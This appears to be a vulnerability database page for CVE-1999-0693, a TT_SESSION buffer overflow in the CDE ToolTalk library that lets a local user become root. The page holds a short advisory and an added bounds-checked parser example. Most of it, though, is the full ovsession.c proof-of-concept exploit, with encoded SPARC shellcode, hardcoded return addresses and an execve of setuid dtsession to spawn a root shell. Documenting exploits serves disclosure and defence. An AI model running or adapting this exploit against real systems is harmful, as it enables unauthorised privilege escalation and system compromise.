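Multiple Vendor CDE TT Session Buffer Overflow Vulnerability
Vulnerability ID | 1105536 | Vulnerability Type | Buffer overflow |
Published | 1999-09-13 | Updated | 2005-05-02 |
CVE ID | CVE-1999-0693 |
CNNVD-ID | CNNVD-200003-007 |
Affected Platform | Linux | CVSS Score | 7.2 |
|Vulnerability Source
|Vulnerability Details
A buffer overflow exists in the handling of the TT_SESSION environment variable in the ToolTalk shared library. A local user can exploit this vulnerability to gain root privileges.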
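An added example, not code from this page or from any vendor: the advisory text quoted further down attributes the overflow to TT_SESSION being handled with no restriction on its size, so a hardened parser rejects oversize input instead of copying it. The eight-field layout follows the TT_SESSION value visible in the proof of concept on this page; the limits, the structure and the function name are assumptions made for illustration.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Assumed limits and layout: 8 space-separated fields, field 6 is a string. */
#define TT_SESSION_MAX 256
#define TT_HOST_MAX    64
#define TT_NFIELDS     8
#define TT_STR_FIELD   6

struct tt_session {                 /* hypothetical structure */
    unsigned long num[TT_NFIELDS];  /* numeric fields; num[TT_STR_FIELD] unused */
    char host[TT_HOST_MAX];         /* the only string field */
};

/* Returns 0 if s is a well-formed, size-bounded session string, else -1. */
int parse_tt_session(const char *s, struct tt_session *out)
{
    const char *p = s;
    if (!s || !out || !memchr(s, '\0', TT_SESSION_MAX + 1))
        return -1;                      /* missing or oversize value */
    memset(out, 0, sizeof *out);
    for (int i = 0; i < TT_NFIELDS; i++) {
        p += strspn(p, " ");
        size_t len = strcspn(p, " ");
        if (len == 0)
            return -1;                  /* too few fields */
        if (i == TT_STR_FIELD) {
            if (len >= sizeof out->host)
                return -1;              /* token does not fit: reject, never truncate */
            memcpy(out->host, p, len);  /* host was zeroed, so it stays terminated */
        } else {
            char *end;
            if (*p < '0' || *p > '9')
                return -1;              /* no sign, no leading junk */
            errno = 0;
            out->num[i] = strtoul(p, &end, 10);
            if (errno == ERANGE || end != p + len)
                return -1;              /* overflow or trailing non-digits */
        }
        p += len;
    }
    p += strspn(p, " ");
    return *p == '\0' ? 0 : -1;         /* extra fields are rejected */
}
```

In a setuid program the environment is caller-controlled, so a check of this kind belongs before any copy into a fixed-size buffer, and privileges should be dropped before the variable is parsed at all.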
|Exploit (EXP)
/*
source: http://www.securityfocus.com/bid/641/info
TRU64/DIGITAL UNIX 4.0 d/f, AIX <= 4.3.2, Common Desktop Environment <= 2.1 20, IRIX <= 6.5.14, Solaris <= 7.0, SunOS <= 4.1.4 TTSession Buffer Overflow Vulnerability
The libtt.so shared library under certain versions of CDE handles a user-defined variable titled TT_SESSION. The code which handles this variable does not place a restriction on its size. At least one of the CDE programs which rely on this variable does not have sufficient bounds checking in place for this variable. This can result in a buffer overflow. The program in question is dtsession.
Due to the fact that dtsession is running setuid root and does not remove the root privilege (at least as tested on Solaris), the overflow can lead to local root compromise.
*/
/*
* ovsession.c
* Job de Haas
* (C) ITSX BV 1999
*
* Some proof of concept code (== really ugly, barely working) at exploiting
* an overflow in libtt.so when parsing the TT_SESSION string.
* Only tested on a Solaris 2.6 sun4c sparc, with and without patch 105802-07
* based loosely on code by horizon <[email protected]>
* Somehow the overflow is very sensitive to caching of the stack. To see that
* it really does work, run it in a debugger and set a break point in tt_open()
* when that is reached, set a breakpoint in sscanf and continue. When that is
* reached continue again and it will either crash or execute a shell.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/systeminfo.h>
#include <unistd.h>
#include <string.h>
#define BUF_LEN 280
char exploit[] =
"2203310015202204027221323100152203310017
22024010320432773702242401133252277377
332432773742203314012022040622132310015
2203310015202204051221323100153203277370
222432401022443240420220407322132310015
2323310015232331001523233100152323310015
2323310015232331001523233100152323310015
17737737734423233100155714215115657153163150QQQ";
#if patched
#define got 0xef6d2be0
#else
#define got 0xef6d2f84
#endif
main()
{
char *argp[6], *envp[20];
char buf[3072];
char *ttsess;
char *display;
u_long *longp;
char data[512];
char padding[64];
char platform[256];
int pad=31;
int i;
memset(buf,0,3072);
memset(buf,'a',BUF_LEN);
longp = (unsigned long *)(buf+BUF_LEN);
/* %l0 - %l7 */
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
/* %i0 - %i7 */
*longp++ = 0xdeadcafe;
*longp++ = 0xefffff94; /* make sure %i1 can be used */
*longp++ = 0xdeadcafe;
*longp++ = got; /* also used before we get to the exploit */
*longp++ = 0xdeadcafe;
*longp++ = 0xdeadcafe;
*longp++ = 0xefffffb0; /* frame with some necessary values */
*longp++ = 0xeffffdd0; /* return into the exploit code */
longp=(unsigned long *)data;
*longp++=0xdeadbeef;
*longp++=0xdeadbeef;
*longp++=0xdeadbeef;
*longp++=0xdeadbeef;
*longp++=0xdeadbeef;
*longp++=0xffffffff;
*longp++=0xdeadbeef;
*longp++=0;
*longp++=0xefffffb4;
*longp++=0x01;
*longp++=0xef6dc154;
*longp++=0xeffffd26;
*longp++=0x00;
argp[0] = strdup("/usr/dt/bin/dtsession");
argp[1] = NULL;
if (!getenv("DISPLAY")) {
printf("forgot to set DISPLAY\n");
exit(1);
}
sysinfo(SI_PLATFORM,platform,256);
pad+=20-strlen(platform)-strlen(argp[0]);
for (i=0;i<pad;padding[i++]='C')
padding[i]=0;
/* create an environment size independent of the size of $DISPLAY */
display = malloc( 8 + strlen(getenv("DISPLAY")) + 1);
strcpy(display,"DISPLAY=");
strcat(display+8,getenv("DISPLAY"));
envp[0] = display;
envp[1] = malloc(60);
memset(envp[1], 0, 60);
memset(envp[1], 'a', 60 - strlen(envp[0]));
strncpy(envp[1],"W=",2);
/* put the exploit code in the env space (easy to locate) */
envp[2] = strdup(exploit);
/* create the overflow string */
ttsess = strdup("TT_SESSION=01 18176 1289637086 1 0 1000 %s 4");
envp[3] = malloc( strlen(ttsess) + strlen(buf));
sprintf(envp[3],ttsess,buf);
/* make it easier to debug, probably smarter ways to do this */
envp[4] = strdup("LD_BIND_NOW=1 ");
/* put some data in the environment to keep the code running after the
overflow, but before the return pointer is used. includes NULL ptrs */
envp[5]=(data);
envp[6]="";
envp[7]="";
envp[8]="";
envp[9]=&(data[32]);
envp[10]="";
envp[11]="";
envp[12]=&(data[39]);
envp[13]="";
envp[14]="";
envp[15]=" 10";
envp[16]=padding;
envp[17]=NULL;
execve("/usr/dt/bin/dtsession",argp,envp);
}
|References
resource:
hyperlink:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/192
resource:
hyperlink:http://www.securityfocus.com/bid/641
resource:
hyperlink:http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9909-103
resource:
hyperlink:https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4374